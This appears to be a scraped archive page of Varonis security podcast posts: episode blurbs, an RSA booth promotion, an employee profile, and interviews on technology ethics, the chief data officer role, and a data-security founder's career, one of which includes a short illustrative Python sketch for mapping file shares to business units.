Other articles discussed:
Panelists: Cindy Ng, Mike Buckbee, Kilian Englert, Kris Keyser
We’re all counting down to the RSA Conference in San Francisco April 16 – 20, where you can connect with the best technology, trends and people that will protect our digital world.
Attendees will receive a Varonis branded baseball hat and will be entered into a $50 gift card raffle drawing for listening to our presentation in our North Hall booth (#3210).
Attendees that visit us in the South Hall (#417) will receive a car vent cell phone holder.
In addition to stopping by our booth, below are sessions you should consider attending. You’ll gain important insights into best security practices and data breach prevention tips, while learning how to navigate a constantly evolving business climate.
Sessions Discussed:
In part one of my interview with Delft University of Technology’s assistant professor of cyber risk, Dr. Wolter Pieters, we learn about the fundamentals of ethics as they relate to new technology, starting with the trolley problem. A thought experiment on ethics, it’s an important lesson in the world of self-driving cars and the course of action the computer on wheels would have to take when faced with potentially life-threatening consequences.
Wolter also takes us through a thought track on the potential of power imbalances when some stakeholders have a lot more access to information than others. That led us to think, is technology morally neutral? Where and when does one’s duty to prevent misuse begin and end?
Privacy, but then again, I think privacy is a bit overrated. This is really about power balance. Everything we do in security will give some people access and exclude other people, and that's a very fundamental thing. It's basically about the power balance that we embed into technology through security. And that is what fundamentally interests me in relation to security and ethics.
Cindy Ng: Let's go back first and start with philosophical, ethical, and moral terminology. The trolley problem: it's where you're presented with a dilemma. You're the conductor and you see the trolley going down a track where it has the potential to kill five people. But if you pull a lever, you can make the trolley go onto the other track, where it would kill one person. And that really is about: what is the most ethical choice, and what does ethics mean?
Wolter Pieters: Right. So, ethics generally deals with protecting values. And values, basically, refer to things that we believe are worthy of protection. So, those can be anything from health, privacy, biodiversity. And then it's said that some values can be fundamental, others can be instrumental in the sense that they only help to support other values, but they're not intrinsically worth something in and of themselves.
Ethics aims to come up with rules, guidelines, and principles that help us support those values in what we do. You can do this in different ways. You can try to look only at the consequences of your actions. And in that case, clearly, in relation to the trolley problem, it's better to kill one person than to kill five. If you simply do the calculation, you could say, "Well, I pull the switch and thereby reduce the total consequences." But you could also argue that certain rules, like "you shall not kill someone," would be violated if you pull the switch. If you don't do anything, then five people will be killed, but you haven't done anything explicitly, whereas if you pull the switch you explicitly kill someone. And from that angle, you could argue that you should not pull the switch.
So, this is very briefly an outline of different ways in which you could reason about what actions would be appropriate in order to support certain values, in this case, life and death. Now, this trolley problem is these days often cited in relation to self-driving cars, which also would have to make decisions about courses of action, trying to minimize certain consequences, etc. So, that's why this has become very prominent in the ethics space.
Cindy Ng: So, you've talked about a power imbalance. Can you elaborate on and provide an example of what that means?
Wolter Pieters: What we see in cyberspace is that there are all kinds of actors, stakeholders that gather lots of information. There are governments interested in doing types of surveillance in order to catch the terrorist amongst the innocent data traffic. There are content providers that give us all kinds of nice services, but at the same time, we pay with our data, and they make profiles out of it and offer targeted advertisements, etc. And at some point, some companies may be able to do better predictions than even our governments can. So, what does that mean? In the Netherlands, today actually, there's a referendum regarding new powers for the intelligence agencies to do types of surveillance online, so there's a lot of discussion about that.
So, on the one hand, we all agree that we should try to prevent terrorism, etc. On the other hand, this is also a relatively easy argument for claiming access to data, like, "Hey, we can't allow these terrorist attacks, so we need all your data." It's very political. And this also makes it possible to leverage security as an argument to claim access to all kinds of things.
Cindy Ng: I've been drawn to ethics and the dilemmas of our technology, and because I work at a data security company, you learn about privacy regulations: GDPR, HIPAA, SOX compliance. At their core, they are about ethics and a moral standard of behavior. Can you address the tension between ethics and technology?
The best thing I read lately was a Bloomberg subhead that said that ethics don't scale. Ethics is such a core value, but at the same time, technology is sort of what drives economies, and then you add an element of government overseeing it all.
Wolter Pieters: There are a couple of issues here. One that's often cited is that ethics and law seem to be lagging behind our technological achievements. We always have to wait for new technology to kind of get out of hand before we start thinking about ethics and regulation. In a way, you could argue that's the case for internet of things developments, where manufacturers of products have been making their products smart for quite a while now. And we suddenly realized that all of these things have security vulnerabilities, and they can become part of botnets of cameras that can then be used to do distributed denial-of-service attacks on our websites, etc. And only now are we starting to think about what is needed to make sure that these devices are securable at some level. Can they be updated? Can they be patched? In a way, it already seems to be too late. So, there is the argument that ethics is lagging behind.
On the other hand, there's also the point that ethics and norms are always, in a way, embedded in technologies. And again, in the security space, whatever way you design technology, it will always enable certain kinds of access and disable other kinds of access. So, there's always this inclusion and exclusion going on with new digital technologies. In that sense, ethics is always already present in a technology. And I'm not sure whether it should be said that ethics doesn't scale. Maybe the problem is rather that it scales too well, in the sense that, when we design a piece of technology, we can't really imagine how things are going to work out if the technology is being used by millions of people. This holds for a lot of these developments.
The internet, when it was designed, was never conceived as a tool that would be used by billions. It was a network for research purposes, to exchange data and everything. The same goes for Facebook. It was never designed as a platform for an audience like this, which means that, in a sense, the norms that are initially embedded into those technologies do scale. And if, for example, for the internet, you don't embed security in it from the beginning and then you scale it up, it becomes much more difficult to change it later on. So, ethics does scale, but maybe not in the way that we want it to scale.
Cindy Ng: So, you mentioned Facebook. And Facebook is not the only tech company that designs systems to allow data to flow through so many third parties, and when people use that data in a nefarious way, the tech company can respond to say, you know, "It's not a data breach. It's how things were designed to work, and people misused it." Why does that response feel so unsettling? I also like what you said in the paper you wrote, that we're tempted to consider technology as morally neutral.
Wolter Pieters: There's always this idea of technology being kind of a hammer, right? I need a hammer to drive in the nail, so it's just a tool. Now, with information technology, it has been discussed for a while that there will always be some kinds of side effects. And we've learned that technologies pollute the environment, technologies cause safety hazards, nuclear incidents, etc., etc. And in all of these cases, when something goes wrong, there are people who designed the technology or operate the technology who could potentially be blamed for those things going wrong.
Now, in the security space, we're dealing with intentional behavior of third parties. They can be hackers, they can be people who misuse the technology. And then suddenly it becomes very easy for those designing or operating the technology to point to those third parties as the ones to blame. You know, like, "Yeah, we just provide the platform. They misused it. It's not our fault." But the point is, if you follow that line of reasoning, you wouldn't need to do any kind of security. Just say, "Well, I made a technology that has some useful functions, and, yes, there are these bad guys that misuse my functionality."
On the one hand, it seems natural to blame the bad guys or the misusers. On the other hand, if you only follow that line of reasoning, then nobody would need to do any kind of security. So, this means that you can't really get away with that argument in general. Then, of course, with specific cases it becomes more of a gray area: where does your duty to prevent misuse stop? And then you get into the question of what an acceptable level of protection and security is.
But also, of course, the business models of these companies involve giving access to some parties, which the end users may not be fully aware of. And this has to do with security always being about: who are the bad guys? Who are the threats? And some people have different ideas about who the threats are than others. So, if a company gets a request from the intelligence services like, "Hey, we need your data because we would like to investigate this suspect," is that acceptable? Or maybe some people see that as a threat as well. So, the labeling of who the threats are matters: are the terrorists the threats? Are the intelligence agencies the threats? Are the advertising companies the threats? This all matters in terms of what you would consider acceptable or not from a security point of view.
Within that space, it is often not very transparent to people what could or could not be done with the data. And then the European legislation is trying, in particular, to require consent of people in order to process their data in certain kinds of ways. Now that, in principle, seems like a good idea. In practice, consent is often given without paying too much attention to the exact privacy policies etc., because people can't be bothered to read all of that. And in a sense, maybe that's the rational decision because it would take too much time.
So, that also means that, if we try to solve these problems by letting individuals give consent to certain ways of processing their data, this may lead us to a situation where, individually, everybody just clicks away the messages, because for them it's rational, like, "Hey, I want this service and I don't have time to be bothered with all this legal stuff." But on a societal level, we are creating a situation where certain stakeholders on the internet get a lot of power because they have a lot of data. This is the space in which decisions are being made.
Cindy Ng: We rely on technology. A lot of people use Facebook. We can't just say goodbye to IoT devices. We can't say goodbye to Facebook. We can't say goodbye to any piece of technology because, as you've said in one of your papers, technology will profoundly change people's lives and our society. Instead of saying goodbye to this wonderful thing, or things, that we've created, how do we go about living our lives and conducting ourselves with integrity, with good ethics, and morals?
Wolter Pieters: Yeah. That's a good question. What currently seems to be happening is that a lot of this responsibility is being allocated to the end users. You decide whether you want to join social media platforms or not. You decide what to share there. You decide whether to communicate with end-to-end encryption or not, etc., etc. So, a lot of pressure is being put on individuals to make those kinds of choices.
And the fundamental question is whether that approach makes sense, whether that approach scales, because the more technologies people are using, the more decisions they will have to make about how to use those technologies. Now, of course, there are certain basic principles that you can try to adhere to when doing your stuff online. On the security side, watch out for phishing emails, use strong passwords, etc. On the privacy side, don't share stuff from other people that they haven't agreed to, etc.
But all of that requires quite a bit of effort on the side of the individual. And at the same time, there seems to be pressure to share more and more stuff, even, for example, pictures of children who aren't able to consent to whether they want their pictures posted or not. So, in a sense, there's a high moral demand on users, maybe too high.
In terms of acting responsibly online, if at some point you decide that we're putting too high a demand on those users, the question becomes, "Okay, are there ways to make it easier for people to act responsibly?" And then you would end up with certain types of regulation that don't only delegate responsibility back to individuals, like asking for consent, but put really strict rules on what, in principle, is allowed or not.
Now, that's a very difficult debate, because you usually end up with accusations of paternalism, like, "Hey, you're putting all kinds of restrictions on what can or cannot be done online. Why shouldn't people be able to decide for themselves?" On the other hand, people are being overloaded with decisions to the extent that it becomes impossible for them to make those decisions responsibly. This tension between leaving all kinds of decisions to the individual and making some decisions on a collective level is going to be a very fundamental issue in the future.
Prior to Varonis, Elena Khasanova worked in backend IT for large organizations. She did a bit of coding, database administration, project management, but was ready for more responsibility and challenges.
So seven years ago, she made the move to New York City from Madison, Wisconsin and joined the professional services department at Varonis.
Even with limited experience speaking with external customers and only basic training, she was entrusted by Varonis to deploy products as well as present to customers. Elena recalls, “Not every company will give you a chance to talk to external customers without prior experience….But it was Varonis that gave me that chance.”
According to her manager, Ken Spinner:
Over the last 6 years, I’ve had the pleasure of working with Elena, first as a coworker in different departments, and most recently as the leader of our Remediation Team in our Professional Services department. Elena was uniquely qualified to lead the team as she had significant experience performing project management prior to planning and completing our first remediation projects. Elena’s knowledge was instrumental in defining the essence of the Varonis Data Risk Assessment, the process used by PS to perform remediation, as well as providing practical insight to Engineering during the development of the Automation Engine.
Not only am I involved in professional services, I also spend a lot of time on sales calls.
What did you learn about yourself after working at Varonis?
I am pretty good at selling concepts and ideas.
How has Varonis helped you in your career development?
Prior to Varonis, I only worked in internal IT. Varonis gave me a chance to work with external customers and exposed me to sales and product management.
What advice do you have for prospective candidates?
Pour your heart and soul into Varonis products. If you are smart and hard-working, it will be noticed right away.
What do you like most about the company?
Despite being a publicly traded company, it kept its startup spirit and passion.
What’s the biggest data security problem your customers/prospects are faced with?
Company files are often accessible by every employee regardless of their roles. How can we fix that without someone losing access to work they really need access to?
What certificates do you have?
CISSP and PMP
What is your favorite book?
Big Magic by Elizabeth Gilbert
What is your favorite time hack?
I assign values to items in my to-do list: importance (not always urgent, but important in the long run), speed, and reluctance.
Things I’m most reluctant to do, I try to do in the beginning of the day when my willpower is still high.
What’s your favorite quote?
"It would not be much of a universe if it wasn't home to the people you love."
– the greatest scientist, Stephen Hawking
In the midst of our nationwide debate on social media companies limiting third-party apps’ access to user data, let’s not forget that companies have been publicly declaring who collects our data and what they do with it. Why? These companies have been preparing for GDPR, the new EU General Data Protection Regulation, which goes into effect on May 25th.
This new EU law is a way to give consumers certain rights over their data while also placing security obligations on companies holding their data.
In this episode of our podcast, we’ve found that GDPR-inspired disclosures, such as Paypal’s, leave us with more questions than answers.
But, as we’ve discussed in our last episode, details matter.
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee, Matt Radolec
With one sensational data breach headline after another, we decided to take on the details behind the story because a concentrated focus on the headline tends to reveal only a partial dimension of the truth.
For instance, when a bank’s sensitive data is compromised, it depends on the how as well as the what. Security practitioner Mike Buckbee said, “It’s very different if your central data storage was taken versus a Dropbox where you let 3rd party vendors upload spreadsheets.”
We’re also living in a very different time when everything we do in our personal lives can potentially end up on the internet. However, thanks to the EU’s “right to be forgotten” law, the public made 2.4 million Google takedown requests. Striking the perfect balance will be difficult. How will the world choose between an organization’s goals (to provide access to the world’s information) and an individual’s right to be forgotten?
And when organizations want to confidently make business decisions based on data-driven metrics, trusting data is critical to making the right decision. Our discussion also reminded me what our favorite statistician Kaiser Fung said in a recent interview, “Investigate the process behind a numerical finding.”
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Forrest Temple, Mike Buckbee
Today, even if we create a very useful language, IoT device, or piece of software, at some point we have to go back to fix the security or send out PSAs.
Troy Hunt, known for his consumer advocacy work on breaches, understands this very well. He recently delivered a very practical PSA: Don’t tell people to turn off Windows update, just don’t.
We also delivered a few PSAs of our own: cybercriminals view our LinkedIn profiles to deliver more targeted phishing emails, whether we’d prefer to deal with ransomware or cryptomalware, and the six laws of technology everyone should know.
Tool of the week: MSDAT
Panelists: Cindy Ng, Forrest Temple, Kilian Englert, Mike Buckbee
IT pros could use a little break from security alerts. They get a lot of alerts. All. The. Time.
While alerts are important, a barrage of them can potentially be a liability. It can cause miscommunication, creating over-reactivity. Conversely, alerts can turn into white noise, resulting in apathy. Hence the adage: if everything is important, nothing is. Instead, should we be proactive about our security risks rather than reactive?
Articles discussed:
Panelists: Cindy Ng, Kilian Englert, Forrest Temple, Kris Keyser
Regular listeners of the Inside Out Security podcast know that our panelists can’t agree on much. So a bold allegation that IT is the most problematic department in an organization can be, ahem, controversial.
But whether you love or hate IT, we can’t deny that technology has made significant contributions to our lives. For instance, grocery stores are now using a system, order-to-shelf, to reduce food waste. There are apps to help drivers find alternate routes if they’re faced with a crowded freeway. Both examples are wonderful use cases, but also have had unforeseen side effects.
Even though profits are up, empty aisles at grocery stores are frustrating shoppers as well as employees. Quiet neighborhoods that became alternate routes are experiencing traffic due to a new influx of drivers as well as noise pollution.
When there are unforeseen consequences from a technological improvement, are we manifesting chaos or a security risk?
Other articles discussed:
Tool of the week: Pown Proxy
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee, Matt Radolec
It’s our first show of 2018 and we kicked off the show with predictions that could potentially drive headline news. By doing so, we’re figuring out different ways to prepare for and prevent future cybersecurity attacks.
What’s notable is that IBM set up a cybersecurity lab where organizations can experience what it’s like to go through a cyberattack without any risk to their existing production systems. This is extremely helpful for companies with legacy systems that might find it difficult to upgrade for one reason or another. But we can all agree that what’s truly difficult are the vulnerabilities you can’t just fix with a patch, such as the Spectre and Meltdown attacks.
Other articles discussed: Hotmail changed Microsoft and email
Panelists: Cindy Ng, Kris Keyser, Kilian Englert
The emergence of Chief Data Officers (CDOs) demonstrates the growing recognition of information as an asset. In fact, Gartner says that 90% of large organizations will have a CDO by 2019.
To understand the CDO role more deeply, I turned to Richard Wendell.
I met Mr. Wendell last year at the Chief Data Officer Summit and thought his background and expertise would help us understand the critical role a CDO plays in managing an organization’s data.
Mr. Wendell is a founding member of the Board of Directors of MIT’s International Society for Chief Data Officers (ISCDO). He has helped create and shape the de facto community of senior executives responsible for maximizing the opportunities in data-driven decision making. Prior to ISCDO, Mr. Wendell spent two and a half years as the Vice President of Data Science and Strategic Analytics for Tyco Electronics.
In this first part in a series of podcasts, Mr. Wendell defines the role of a CDO, the value a CDO brings to an organization and what a CDO needs to do in order to thrive.
Most recently, Mr. Wendell is a founding member of the board of directors of MIT's International Society for Chief Data Officers.
I'm thrilled to have Richard Wendell join us today to tell us more about the goals of a CDO. Because, according to Gartner, by 2019, 90% of large organizations will have a Chief Data Officer.
Richard: Sure, Cindy, happy to. So, the world around us is changing very, very fast. Particularly, when you start talking about information and technology. So, just out of curiosity I went and I was looking at Google Analytics and Google Trends and some search terms for "chief data officer." And the first blip that we start seeing of any significance around "chief data officer" searches came in late 2011. Then we start to see another uptick in 2012.
And, more or less, since 2013, up through current time, the searches on Google for the word "chief data officer" are growing at 100% compound annual growth rate. So, really substantial uptick.
Like many areas in their early days, there are different meanings for what people mean by "chief data officer" and the areas of responsibility.
What we're seeing is different flavors of chief data officers, but by and large they can be characterized in sort of two buckets: the defensive chief data officer and the offensive chief data officer.
Defensive CDOs, often found in financial services, are typically responsible for data governance, reporting, and regulatory work, which are really critical functions.
Quite different from the offensive CDOs we're seeing. Offensive CDOs can still be in financial services, but increasingly in other sectors, like life sciences, retail, and CPG, they are focusing on transforming 20th-century companies that want to be 21st-century companies. So really, transforming the enterprise around data and analytics, and coming out with new ways of using data and data science to create insights that are truly going to be transformational for the way that business conducts itself into the future.
You can see, both called CDOs, but two very, very different missions and mandates.
Richard: So, answering that question is, I think, very largely part of the job of the CDO, right?
So, quite often for a CDO, particularly offensive CDOs, the job starts like this: a CEO or a CFO or maybe a CMO says,
"We want our company to use data science. We want our company to be more data driven, and we want to start capitalizing on these new technologies. Go figure out what that means for us." And that's quite often the beginning point for a chief data officer. Now, I think on a high level, in my mind, the chief data officers who are looking to drive transformation and innovation have to successfully string together three critical areas:
At the beginning of the value chain is raw data, and at the end is raw dollars.
If you want to get from raw data to raw dollars, you have to check all three of those boxes. And, so many organizations focus on that middle slice, the analysis piece, the insights piece. Insight is incredibly important, but insight's only one of those three boxes.
Richard: Yeah, yeah, I mean data is absolutely critical for sure. I mean data is the raw material, the building blocks on which everything else is contingent. So I would argue that data is critical, necessary, but not sufficient.
At the end of the day, creating the right data that is ready for analysis and driving insight is really, really challenging. I don't want to undermine the really intense hard work that goes into figuring out what to do when your enterprise has many, many data centers, or legacy ETL scripting that is indecipherable and not well documented.
These are just two of the many challenges that Chief Data Officers face in creating good quality data. I would just say though, that businesses are here to make money. That could mean different things. It could be on the P&L side, on revenue and growth like you're talking about. Or, it could be cost savings efficiencies, right? Or, it could also be over on the balance sheet.
There are many, many fantastic data and analytics use cases that don't hit the P&L: maybe it's a reduction in inventory that flows over to cash savings on the balance sheet, or an increase in customer lifetime value, which has many intangible effects.
So, I think really, across all the company financials, it's really the job of a chief data officer to understand business strategy and corporate strategy well enough to say, "What is the company's strategy? Are we here to accelerate revenue and growth? Are we here to transform our industry? Or are we here to drive efficiencies?"
And then, based on that corporate strategy, figure out where the right strategic levers are across the P&L and the balance sheet, and then what data has to be put together, prepared in what way, and used in what combination with analytics to drive those strategic levers.
Inside Out Security: And for the CDO to highlight: okay, here's why you brought me in, here's what's important to the company, here's how we'll achieve it, and here's the roadmap to where we want to go.
Richard: Yeah, and you know, here's the money that we're making because I'm here. I think that one of the critical, sort of in my opinion, one of the critical success factors of a chief data officer is being able to translate between the technical language of data and analytics, and the maybe less technical but equally important language of business and strategy.
So, when you are talking to a CEO or a Board of Directors or a CFO or a CMO or whoever it may be, you're not speaking geek all the time, right?
You're speaking to them in a language that they understand, and you're talking to them about making money. Which, ultimately, most businesses are around to make money.
Inside Out Security: And really, for this CDO to speak their language too.
Richard: So important, being a good listener. I think that CDOs really...in order to know where to focus and prioritize the really, frankly, expensive investments in data and analytics that companies are making - it's so important to be able to listen to one's stakeholders, be it the GMs or presidents of a large business unit or the chief marketing officer.
But really, those partners who are ultimately going to be critical to the adoption of the insights that are created out of data and analytics, that translate those insights into action, and ultimately money.
Listening to them and what are their priorities is such a really important first starting point. Because at the end of the day if...we could be creating the coolest data asset in the world, but if it's not generating insights that people care about or want to act on, it's hypothetical.
Richard: The relationship with a chief marketing officer is really critical.
I mean it's very different for different kinds of companies. Obviously, consumer companies have very different marketing focus than B-to-B companies, so I can't 100% generalize all the time.
But by and large, marketing is on the front end of the business.
Marketing often owns the customers. Marketing is quite often either responsible for customer acquisition, or closely partnered with sales, and jointly responsible for customer acquisition. And increasingly, responsible for the digital channels, so the web channels to the customer, and other digital channels.
And those digital channels have a lot of data, and a lot of analytics.
And, what has happened in a lot of companies is the marketing teams have built up their own sort of ownership of customer data. Be it CRM data, be it digital web data, and maybe even some of their own specialized analytics around how to leverage that data to get the right insights from a marketing perspective. All good things, all very good things, but from a different perspective you could also think of that as a silo.
So, what happens in a company where at the end of the day...say the company is manufacturing a product, right?
Maybe it's the case that getting the product that you make to your customer quickly is the largest driver of customer satisfaction and customer lifetime value. That makes sense. People want to get the things they buy quickly, right? That's Amazon's model.
Well, in a lot of these companies, how much of a product you manufacture and how much inventory you store is more on the operations side. So, what do you do in a company where that operational or transactional data resides either in operations or in IT, and marketing has the digital data?
But at the end of the day, the company wants to do the right things for its customers. It wants to get the customers, in this example, their products quickly. Well, in this kind of...this is a perfect example. I've seen it many times. And this is where a chief data officer comes in.
A chief data officer's primary job is breaking down these silos and helping a company optimize all of its data and analytics through different groups to get to its strategy.
Self-quantified trackers made possible what was once nearly unthinkable: for individuals to gather data on their activity levels in order to manage and improve their performance. Some have remarked that self-quantified devices can verge on over-management. As we wait for more research reports on the right dose of self-management, we’ll have to define for ourselves what the right amount of self-quantifying is.
Meanwhile, it seems that businesses are also struggling with a similar dilemma: measuring the right amount of risk and harm as it relates to security and privacy.
Acting FTC Chairman Maureen Ohlhausen said at a recent privacy and security workshop, “In making policy determinations, injury matters. ... If we want to manage privacy and data security injuries, we need to be able to measure them."
A clearly defined measurement of risk and harm will become ever more important as the business world embraces deep learning and eventually artificial intelligence.
Other articles discussed:
The end of the year is approaching and security pros are making their predictions for 2018 and beyond. So are we! This week, our security practitioners predicted items that will become obsolete because of IoT devices. Some of their guesses: remote controls, service workers, and personal cars.
Meanwhile, as the business world phases out old technologies, some are embracing new ones. For instance, many organizations today use chatbots. Yes, they’ll help improve customer service. But some are worried that when financial institutions embrace chatbots to facilitate payments, cybercriminals will see it as an opportunity to impersonate users and take over their accounts.
And what about trackers found in apps bundled with DNA testing kits? From a developer’s perspective, all the trackers help improve the usability of an app, but does that mean we’ll be sacrificing security and privacy?
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Kris Keyser, Mike Buckbee
Recently the Food and Drug Administration approved the first digital pill. This means that medicine embedded with a sensor can tell health care providers – doctors and individuals the patient approves – whether the patient has taken his medication. The promise is huge. It will ensure better health outcomes for patients, giving caretakers more time with the ones they love. What’s more, by learning more about how a drug interacts with the human system, researchers might find ways to prevent illnesses that were once believed impossible to cure. However, some security pros in the industry believe that the potential for abuse might overshadow the promise of what could be.
Other articles discussed:
Panelists: Cindy Ng, Mike Thompson, Kilian Englert, Mike Buckbee
Last week, I came across a tweet that asked how a normal user is supposed to make an informed decision when a security alert shows up on his screen. Great question!
I found a possible answer to that question in New York Times director of information security Runa Sandvik’s recent keynote at the O’Reilly Security Conference.
She told the attendees that many moons ago, Yahoo had three types of infosecurity departments: core, dedicated and local.
Core was the primary infosec department. The dedicated group were subject matter experts on security who were still in the infosec department but worked with other teams to help them conduct their activities in a secure way. The security pros in the local group were not officially in the infosec department, but they were the security experts on another team.
Who knew that once upon a time dedicated and local security teams existed?! It would make natural sense for them to be the ones assisting end users with security questions, so why don’t we bring them back? The short answer: it’s not so simple.
Other articles discussed:
Long before cybersecurity and data breaches became mainstream, founder and CEO of SPHERE Technology Solutions, Rita Gurevich, built a thriving business on the premise of helping organizations secure their most sensitive data from within, instead of securing the perimeter from outside attackers.
And because of her multi-faceted experiences interacting with the C-Suite, technology vendors, and others in the business community, we thought listening to her singular perspective would be well worth our time.
What stood out in our podcast interview? While others are concerned about limited security budgets, Gurevich envisions more hands on deck in the field of information security. The reason: there are more and varied threats, an oversaturated vendor marketplace, and a cybersecurity workforce shortage.
“What I see happening is that there’s going to be subject matter CISOs across the company; where there will be many people with that title that become experts in very specific domains.”
Also, even though cybersecurity concerns are no longer as industry-specific as they once were, Gurevich does recognize that certain industries are more at risk than others.
She approaches all industries with varying degrees of risk and threats, compliance requirements, and disparate systems all in a strategic way – by giving organizations the visibility into their data and systems, what they need to protect and how they need to protect it.
Rita, you founded SPHERE in the wake of the 2008 financial crisis when you were just 25 years old. Can you tell us about the process behind how you started your business and what kind of services you provide?
Rita Gurevich: Absolutely, I started the company, essentially, on the collapse of Lehman Brothers. And after the bankruptcy, there were many different firms that bought different areas of Lehman. And I was put on a team to help figure out how to split apart all the different data and assets they owned.
So if you can imagine, up until that point, Lehman was super centralized. It was operating as one company, with lots of shared services.
And overnight, we essentially had to figure out who gets what.
So Barclays Capital bought a part of the business. Nomura bought a part of the business. Neuberger bought a part of the business. All these different financial services firms bought different business units from Lehman Brothers.
And what we had to do was essentially a crash course in deep data analytics. We had to learn how to get a really quick understanding of who uses what and map that to different business entities, to figure out where it needed to go.
So that required a lot of tools, a lot of metrics. We built all these algorithms. And we had to do it almost overnight.
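To make that kind of mapping concrete, here is a minimal sketch of the general idea: tally file-activity events per share by business unit and route each share to the unit that uses it most. The event format, the user-to-unit lookup, and the "most active unit wins" rule are illustrative assumptions for this sketch, not details from the interview.

# Minimal sketch: assign each file share to the business unit that uses it most.
# All names and inputs below are hypothetical examples.
from collections import Counter, defaultdict

# Hypothetical access events captured from file-activity auditing: (user, share)
access_events = [
    ("alice", r"\\fs01\ibd-models"),
    ("bob", r"\\fs01\ibd-models"),
    ("carol", r"\\fs01\wealth-reports"),
]

# Hypothetical lookup of which business unit each user belongs to
user_to_unit = {
    "alice": "Investment Banking",
    "bob": "Investment Banking",
    "carol": "Investment Management",
}

def assign_owners(events, user_to_unit):
    """Tally access activity per share by business unit and pick the most active unit."""
    tallies = defaultdict(Counter)
    for user, share in events:
        unit = user_to_unit.get(user)
        if unit:
            tallies[share][unit] += 1
    # Each share is routed to whichever unit generated the most access events.
    return {share: counts.most_common(1)[0][0] for share, counts in tallies.items()}

if __name__ == "__main__":
    for share, unit in assign_owners(access_events, user_to_unit).items():
        print(f"{share} -> {unit}")

In practice this kind of analysis would also weigh ownership metadata, recency of activity, and manual review, but the core "who uses what, and where should it go" logic is the same.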
And soon after that slightly traumatic time in the history of our country, I had a bit of an ‘aha’ moment and decided to do some independent consulting.
I quickly built a business, and now we focus on cybersecurity. We have a niche around data governance, identity and access management, as well as privileged access management. And a lot of the experience that I gained at Lehman was very relevant for what I do now, because you essentially had to figure out: how do I capture the information that's necessary from my environment to create metrics and analytics that are relevant to making sure my information is secure, understanding who owns what, and even potentially preparing myself for some M&A activity?
Cindy Ng: And so, can you describe your work at Lehman Brothers and how you made the connection that it was important to start your business?
Rita Gurevich: Sure. So, during that time, during the bankruptcy, it was really all about data analytics. It was really about looking at all the different data, all the different assets that Lehman owned and figuring out, "Okay, who gets what?" So, if Barclays bought investment banking, how do you know what data belongs to investment banking? If Neuberger Berman bought the investment management business, how do you figure out what data belongs to investment management? So, it was all around going really deep into the data, and using the right tools to capture all the metadata and all the activity, so you can gain an understanding of who's using it, who owns it, and where it needs to go.
So, at that time, not a lot of companies were doing that, and there wasn't really a lot of need to do that at the time. But around 2008-2009, there was just so much movement within financial services. And there was so much happening in terms of companies going bankrupt, being acquired by other companies, all these different businesses kind of spinning up, and changing, and moving hands that this concept became a lot more relevant. So, when I started the company, it really was around selling myself and my experience that I learned, which was very unique at the time. But over the course of not a very long amount of time, probably two years or so, the focus definitely shifted.
So, initially I was talking to infrastructure people, I was talking to operations people, and I was talking about data analytics. And while it was definitely a nice-to-have and people cared about it, budgets were really tight. We were still knee-deep in one of the worst recessions in our country's history. So where were the budgets, where were people focusing, where were the executives and the board members allocating resources? That was information security. So around 2009-2010, I think the concept of data breaches became a lot more relevant. It became more of a commonly used term. Companies were starting to actually hire chief information security officers. They were starting to look at data analytics from a security perspective. They wanted to get a better handle on things to prevent data from getting into the wrong hands, and that's when I shifted the focus from data analytics to data security. And I think that was monumental for me, because really that's the premise of what my company does today around the data governance programs that we implement.
So I think that my experience at Lehman was definitely a blessing in disguise, but I think that probably anybody that was focusing on data analytics, even tangentially, started to think about data security as well.
Cindy Ng: You were 25 when you first started your business. A lot of your college cohorts were still on their first, second, or third job. Was that relevant, or did you just look at the opportunity and run with it?
Rita Gurevich: I think that my age was probably one of my biggest challenges when it came to starting my business, definitely in the earlier years. And you can only imagine, you know, a 25 year old walking into a managing director's office and essentially telling them that she can do a better job than his team can do. That's a really difficult thing to say, and you gotta prove it. So, once you actually start working for them, you better do a good job, which luckily I did and my team did. But compared to my other college cohorts, I actually think it helped that I went to Stevens Institute of Technology in Hoboken, New Jersey. My business is in Jersey City. My customers are international, but quite a few of them have headquarters in this tri-state area. A lot of my college peers went on to work at all these different companies that could be potential customers of SPHERE. So, I think it actually created an opportunity for me because it opened the door to have the right conversations with people in technology, to explain, you know, what I'm working on and what I'm doing.
And, you know, part of having a successful business is not just a good idea, but it's having people that you can actually sell to, having a relevant problem that's gonna help people in their professional careers and their professional lives. So I think that my relationship from school and being not so far off from graduating college helped more than hurt. But also from the Lehman bankruptcy, like I mentioned earlier, it was a time where there was a lot of movement, and a lot of people went to all sorts of different firms on the street. And it was different than how it used to be in the past, where people stayed at the same company for a really long time. That movement essentially for me, created an overnight network, where I was able to kind of leverage people that I knew and had worked with for a handful of years across all sorts of different companies within the demographic that I was targeting. So, yeah, I think that the age was definitely sometimes a challenge, but I actually found ways to have it be a benefit as well.
Cindy Ng: But in terms of age, it's almost non-relevant as long as you have a value proposition, and people are interested.
Rita Gurevich: That's a really, really good point. So, there are kind of two aspects to it, right? If you have something interesting to say, that's great, but the way you communicate that message is almost more important, and there has to be a confidence in the way that you present the problem that you're solving and your solution. That's going to set you apart from others who are knocking on the same people's doors, maybe for different areas, but are competing for the attention of the people that you're trying to get in front of. So, I call that, you know, learned confidence. I can't honestly say that at 25 I felt like I knew everything. I knew I didn't, but you have to be able to present yourself in a way where the person on the other side of the table knows that, even if you don't know the answer, you will figure it out. And the other part of that is perseverance. You have to make sure that you continuously have your goals in mind and push forward.
You know, I mentioned that my company focuses on security, and while that's still relevant and even in 2008, 2009, 2010, it was also very relevant. You can imagine that the people that are in charge of security at these companies have lots of vendors, and lots of partners, and lots of even internal people, knocking on their door vying for their time. So you have to just make sure that your message comes across strong and that, again, there's a confidence in your approach, and you will deliver when push comes to shove.
Cindy Ng: And when you talk about your learned confidence, when a meeting didn't go as planned, or a presentation didn't go as planned, what was your self-talk like?
